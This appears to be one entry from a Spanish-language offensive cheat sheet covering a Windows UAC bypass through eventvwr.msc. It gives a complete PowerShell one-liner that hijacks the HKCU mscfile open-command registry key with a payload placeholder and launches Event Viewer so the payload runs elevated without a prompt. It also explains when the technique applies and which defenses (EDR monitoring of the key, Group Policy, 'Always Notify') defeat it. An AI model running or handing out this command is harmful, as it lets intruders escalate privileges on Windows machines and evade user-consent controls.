UAC bypass eventvwr
New-Item "HKCU:\Software\Classes\mscfile\shell\open\command" -Force ; Set-ItemProperty "HKCU:\Software\Classes\mscfile\shell\open\command" -Name "(default)" -Value "<payload>" ; Start-Process "C:\Windows\System32\eventvwr.msc"
Bypass de UAC abusando de eventvwr.msc: secuestra la clave HKCU de mscfile para que el Visor de eventos (firmado por Microsoft) ejecute tu payload elevado.
Cuando tienes una sesión como usuario estándar y quieres un proceso elevado sin prompt UAC. eventvwr.msc es un binario firmado de Microsoft que se auto-eleva; al abrirlo, consulta el registro HKCU antes que HKLM, ejecutando tu comando con token elevado.
Si el EDR monitoriza la clave mscfile en HKCU (firma muy conocida) o la auto-elevación está deshabilitada por GPO. En hosts con UAC en 'Always Notify' esta técnica falla (igual que fodhelper).